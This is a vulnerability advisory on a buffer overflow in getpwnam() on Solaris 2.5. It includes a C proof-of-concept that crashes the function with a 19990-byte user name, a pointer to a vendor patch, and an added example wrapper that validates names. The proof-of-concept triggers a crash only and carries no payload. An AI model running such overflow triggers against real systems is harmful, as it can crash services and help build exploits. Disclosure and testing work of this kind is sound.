COMMAND

    getpwnam()

SYSTEMS AFFECTED

    Solaris 2.5

PROBLEM

    Charles Howes found the following.  This program dies on Solaris
    2.5 when it passes a 19990-byte user name to getpwnam(), which
    shows that getpwnam() has an overflowable buffer.

    ------------------------------------------------------------------
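    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <pwd.h>
    #include <signal.h>

    /* SIGBUS handler: reached when getpwnam() faults on the long name. */
    void foobomb(int sig)
    {
      (void)sig;
      printf("Uhoh... getpwnam() died.\n");
      exit(1);
    }

    int main(void)
    {
      char buf[20000];
      struct passwd *pw;

      /* Build a 19990-byte user name and terminate it. */
      memset(buf,'a',19990);
      buf[19990]='\0';
      signal(SIGBUS,foobomb);
      pw=getpwnam(buf);
      signal(SIGBUS,SIG_IGN);
      if (!pw)
        {
        printf("Success, no user was found.\n");
        }
      else
        {
        printf("What the... a user was found?\n");
        printf("  user: %.100s\n",pw->pw_name);
        }
      return 0;
    }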
    ------------------------------------------------------------------

SOLUTION

    Review and apply Patch-ID# 103612-23.
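
    A caller-side guard that keeps overlong or malformed names away
    from getpwnam(), as an added example that is not part of the
    original advisory.  The names name_is_sane and checked_getpwnam
    and the 32-byte limit are assumptions made for illustration.

```c
#include <errno.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>

/* Assumed upper bound on a login name; not taken from the advisory. */
#define MAX_LOGIN_NAME 32

/* Returns 1 if name is non-empty, does not start with '-', uses only
 * the portable characters A-Z a-z 0-9 . _ - and is terminated within
 * MAX_LOGIN_NAME bytes. The scan never goes past that bound. */
int name_is_sane(const char *name)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789._-";
    size_t i;

    if (name == NULL || name[0] == '\0' || name[0] == '-')
        return 0;
    for (i = 0; i <= MAX_LOGIN_NAME; i++) {
        if (name[i] == '\0')
            return 1;               /* terminated within the bound */
        if (strchr(allowed, name[i]) == NULL)
            return 0;               /* unexpected byte */
    }
    return 0;                       /* no terminator within the bound */
}

/* Hypothetical wrapper: the library is only called with a checked name. */
struct passwd *checked_getpwnam(const char *name)
{
    if (!name_is_sane(name)) {
        errno = EINVAL;
        return NULL;
    }
    return getpwnam(name);
}

int main(void)
{
    static char buf[20000];         /* same input as the test program above */
    memset(buf, 'a', 19990);
    buf[19990] = '\0';
    printf("long name %s\n", checked_getpwnam(buf) ? "looked up" : "rejected");
    return 0;
}
```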